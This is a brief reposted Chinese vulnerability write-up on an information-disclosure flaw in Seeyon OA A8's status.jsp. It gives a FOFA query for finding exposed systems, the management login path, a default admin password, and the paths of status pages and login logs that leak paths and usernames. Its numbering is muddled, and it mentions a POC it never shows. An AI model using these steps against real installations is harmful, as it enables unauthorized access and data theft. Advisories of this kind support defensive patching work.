致远OA A8 status.jsp 信息泄露漏洞

本文转载于公众号：融云攻防实验室，原文地址：

0x01 阅读须知

0x02 漏洞描述

致远OA办公自动化软件，用于oa办公自动化软件的开发销售。2010年，用友致远更名为致远协创。2017年更名为致远互联。北京致远互联软件股份有限公司（简称：致远互联）成立于2002年3月，总部设立在北京，是一家集协同办公产品的设计、研发、销售及服务为一体的企业。致远OA A8-m等业务系统status.jsp处存在敏感信息泄露，攻击者可以从其中获取网站路径和用户名等敏感信息进一步攻击。

0x03 漏洞复现

fofa：app=”致远互联-OA”

1.执行POC查询用户名，得到数据库账户密码

1.登录页面：
/seeyon/management/index.jsp

2.默认密码：
WLCCYBD@SEEYON

2.查看敏感信息
/seeyon/management/status.jsp
/seeyon/logs/login.log
/seeyon/logs/v3x.log